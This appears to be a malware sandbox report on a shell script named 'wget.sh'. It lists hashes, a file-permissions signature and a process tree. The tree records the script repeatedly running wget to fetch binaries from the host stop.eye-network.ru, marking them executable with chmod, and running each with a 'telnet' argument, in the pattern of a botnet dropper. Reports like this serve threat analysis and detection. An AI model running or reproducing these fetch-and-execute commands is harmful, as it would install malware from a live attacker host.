Analysis
-
max time kernel
0s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
18-12-2024 13:17
Static task
static1
Behavioral task
behavioral1
Sample
wget.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
wget.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
wget.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
wget.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
wget.sh
-
Size
676B
-
MD5
5b3ceaec7a3ad11b45f5fca1b603d939
-
SHA1
5e5ee3fa232288f77e670c66d8ca42c0cc171e45
-
SHA256
bb30e07b49a7b5879ee19bcd3beeab6e70ec1451833782537622e6a4b31838fa
-
SHA512
47efd53dd2696243413fe686c9eeaccf6a0ac07afe72674bd27ee5f6583c45734295941e0540e63c0dd29e2e8f57a1638c4d3de02f7412d71005accb52dfe215
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid / Process: 1551 chmod, 1554 chmod, 1560 chmod, 1566 chmod, 1515 chmod, 1524 chmod, 1539 chmod, 1518 chmod, 1530 chmod, 1545 chmod
Processes
-
/tmp/wget.sh — /tmp/wget.sh 1⤵ PID:1510
-
/usr/bin/wget — wget http://stop.eye-network.ru/wkb86 2⤵ PID:1511
-
-
/bin/chmod — chmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh 2⤵
- File and Directory Permissions Modification
PID:1515
-
-
/tmp/wkb86 — ./wkb86 telnet 2⤵ PID:1516
-
-
/usr/bin/wget — wget http://stop.eye-network.ru/kqibeps 2⤵ PID:1517
-
-
/bin/chmod — chmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh 2⤵
- File and Directory Permissions Modification
PID:1518
-
-
/tmp/kqibeps — ./kqibeps telnet 2⤵ PID:1519
-
-
/usr/bin/wget — wget http://stop.eye-network.ru/bojwsl 2⤵ PID:1520
-
-
/bin/chmod — chmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh 2⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/bojwsl — ./bojwsl telnet 2⤵ PID:1528
-
-
/usr/bin/wget — wget http://stop.eye-network.ru/njvwa4 2⤵ PID:1529
-
-
/bin/chmod — chmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh 2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/njvwa4 — ./njvwa4 telnet 2⤵ PID:1534
-
-
/usr/bin/wget — wget http://stop.eye-network.ru/ngwa5 2⤵ PID:1535
-
-
/bin/chmod — chmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh 2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/ngwa5 — ./ngwa5 telnet 2⤵ PID:1540
-
-
/usr/bin/wget — wget http://stop.eye-network.ru/woega6 2⤵ PID:1541
-
-
/bin/chmod — chmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh 2⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/woega6 — ./woega6 telnet 2⤵ PID:1546
-
-
/usr/bin/wget — wget http://stop.eye-network.ru/fnkea7 2⤵ PID:1547
-
-
/bin/chmod — chmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh 2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/fnkea7 — ./fnkea7 telnet 2⤵ PID:1552
-
-
/usr/bin/wget — wget http://stop.eye-network.ru/gnjqwpc 2⤵ PID:1553
-
-
/bin/chmod — chmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh 2⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/gnjqwpc — ./gnjqwpc telnet 2⤵ PID:1555
-
-
/usr/bin/wget — wget http://stop.eye-network.ru/wlw68k 2⤵ PID:1556
-
-
/bin/chmod — chmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh 2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/wlw68k — ./wlw68k telnet 2⤵ PID:1564
-
-
/usr/bin/wget — wget http://stop.eye-network.ru/wrjkngh4 2⤵ PID:1565
-
-
/bin/chmod — chmod +x config-err-V8i1f1 netplan_1g28a08u snap-private-tmp ssh-zYBNdZVpQqvt systemd-private-db8c9e4d3e954cef901cb4690baf26be-bolt.service-xxuCDF systemd-private-db8c9e4d3e954cef901cb4690baf26be-colord.service-h3886O systemd-private-db8c9e4d3e954cef901cb4690baf26be-ModemManager.service-vaOZi0 systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-resolved.service-xlinxd systemd-private-db8c9e4d3e954cef901cb4690baf26be-systemd-timedated.service-kLFUxq wget.sh 2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/wrjkngh4 — ./wrjkngh4 telnet 2⤵ PID:1570
-